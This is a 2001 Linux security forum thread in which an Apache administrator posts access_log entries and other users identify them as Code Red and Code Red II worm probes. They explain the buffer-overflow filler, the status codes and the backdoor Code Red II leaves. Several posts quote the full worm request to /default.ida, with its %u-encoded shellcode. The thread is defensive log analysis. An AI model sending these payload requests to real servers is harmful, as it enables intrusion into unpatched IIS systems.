LinuxQuestions.org
Latest LQ Deal: Latest LQ Deals
Home Forums Tutorials Articles Register
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 08-03-2001, 10:37 AM   #1
burger97
LQ Newbie
 
Registered: Aug 2001
Location: San Jose, CA
Posts: 1

Rep: Reputation: 0
access_log full of junk, could it be code red worm?


Hi,
For weeks now I've seen my Red Hat 7.0 server filling up with gibberish. I setup another system, Red Hat 7.1 this time with full security. I even added firewall settings to only allow ftp and http traffic. But now I'm getting the same garbage in my access_log file of apache. Here's what it looks like:

62.131.253.216 - - [03/Aug/2001:09:15:30 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 330
213.1.22.239 - - [03/Aug/2001:09:42:05 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 330

As you can see in the above example it's not just from one IP address. The 400s means it's a bad request. But! Could this be the Code Red Worm trying to infect? Or a hacker that's compromised the net in another way?

Thanks for all the help u can provide. Also if anyone else is seeing this please leave a note. I kinda feel I'm not an isolated situation.
 
Old 08-03-2001, 01:52 PM   #2
mcleodnine
Senior Member
 
Registered: May 2001
Location: Left Coast - Canada
Distribution: s l a c k w a r e
Posts: 2,731

Rep: Reputation: 45
Yep, it's just the CodeRed requests. If you're running IIS over NT/2K then I hope you are patched. If you're running Apache then no harm done other than chewing up some some bandwidth. If you're running apache have a look at this week's security notes. I just upped to 1.3.20 from 1.3.17 (OK it was LONG overdue).
 
Old 08-04-2001, 09:13 PM   #3
mcleodnine
Senior Member
 
Registered: May 2001
Location: Left Coast - Canada
Distribution: s l a c k w a r e
Posts: 2,731

Rep: Reputation: 45
Wow. Here's an update. There's a NEW variant that appears to be more selective about the subnet it's scanning. I'm getting around 20+ requests per hour at the time of this writing and the flow has been increasing al day. The 'new' worm's calling card is just a little different;
Code:
24.113.81.7 - - [04/Aug/2001:18:55:04 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 274
Note the use of "XXX" rather than "NNN" (didn't see it until well into my 2nd cup of coffee). http://www.incidents.org/diary/diary.php has a recent (21:15 EST Aug 04) report which also claims that the new version may leave a gaping HOLE in your NT boxen.
Quote:
Both Henk Wevers and corecode submitted packet traces of the complete
request as shown below. Comparing this trace with the original Code Red
(see the Code Red Infection Illustrated section of the July 23
Handler's Diary at: http://www.incidents.org/diary/july2001.php)
it is immediately obvious that we are dealing with a new worm.
Note that line 820 shows that the worm is doing something with
CMD.EXE; also the dump contains the string 'CodeRedII' on line 230.
Note the references to root.exe on lines 840 and 880.
Lift a pint on this long weekend for the poor slobs who are rushing back to the IIS ranch for damage control.
 
Old 08-10-2001, 09:53 PM   #4
aimstr8
Member
 
Registered: Mar 2001
Posts: 40

Rep: Reputation: 15
code red 2

I got it too:

dsl-64-171-1-244.dsl.sntc01.pacbell.net - - [10/Aug/2001:19:32:58 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 299
hse-kitchener-ppp232166.sympatico.ca - - [10/Aug/2001:19:44:14 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 299
 
Old 08-10-2001, 10:47 PM   #5
gcombe74
Member
 
Registered: Jul 2001
Location: Utah, Roy
Distribution: Gentoo
Posts: 72

Rep: Reputation: 15
What is the significance in changing from N to X ? And are the last numbers after the http 1.0 the port number?
 
Old 08-11-2001, 06:08 AM   #6
jharris
Senior Member
 
Registered: May 2001
Location: Bristol, UK
Distribution: Slackware, Fedora, RHES
Posts: 2,243

Rep: Reputation: 47
Quote:
Originally posted by gcombe74
And are the last numbers after the http 1.0 the port number?
The first nunber is the code that indicates the status of the request - 404 being and error that the server was unable to find the file. The second number is the size of the transfer to the client.

cheers

Jamie...
 
Old 08-11-2001, 02:39 PM   #7
mcleodnine
Senior Member
 
Registered: May 2001
Location: Left Coast - Canada
Distribution: s l a c k w a r e
Posts: 2,731

Rep: Reputation: 45
Quote:
Originally posted by gcombe74
What is the significance in changing from N to X ?
The "NNNN" sequence was the original CodeRed worm. The "XXXX" is the CodeRedII. The N's and the X's are just used as fodder for the buffer overflow. The buffer examines these and says "Hey I can't run that crap!" However it completely ignores anyhting over 255(?) bytes and that's the 'payload' that makes the connection and gets the remainder of the code home.

Also note that while the worms have been dubbed CodeRed and CodeRedII, the only real similiarities are that they both use the same exploit to 'get in' and they both actively scan networks for a new host to infect. CodeRedII uses a meaner network scanner and leaves a backdoor to the entire system, regardless of permissions and allows shell commands to be executed from a remote station. Nasty.
 
Old 08-11-2001, 03:19 PM   #8
gcombe74
Member
 
Registered: Jul 2001
Location: Utah, Roy
Distribution: Gentoo
Posts: 72

Rep: Reputation: 15
thanks Jamie and mcleodnine for answering my question, very thoughtout and well implemented "Code". What a mess if every programmer on the planet wanted to wreck havoc on the net!

Take care!
 
Old 08-13-2001, 05:43 AM   #9
TWOFOURALPHA
LQ Newbie
 
Registered: Jun 2001
Posts: 9

Rep: Reputation: 0
I'm getting this too, my question however is, how do I get my apache server logs to do DNS lookups?

[EDIT]

Sorry, I RTFM and found it in httpd.conf

Last edited by TWOFOURALPHA; 08-13-2001 at 05:48 AM.
 
  


Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
the code name of red hat tukang_minta Linux - Newbie 2 08-15-2003 05:24 PM
cdrecord junk; /proc junk lackluster Linux - Software 5 08-06-2003 10:37 PM
Code Red--Should I Even Bother? green_dragon37 General 12 06-29-2003 05:15 PM
Red Hat Source Code trick Linux - Distributions 6 04-30-2003 11:29 AM
Code Red g_goblin Linux - Security 3 11-14-2002 07:28 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 01:08 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration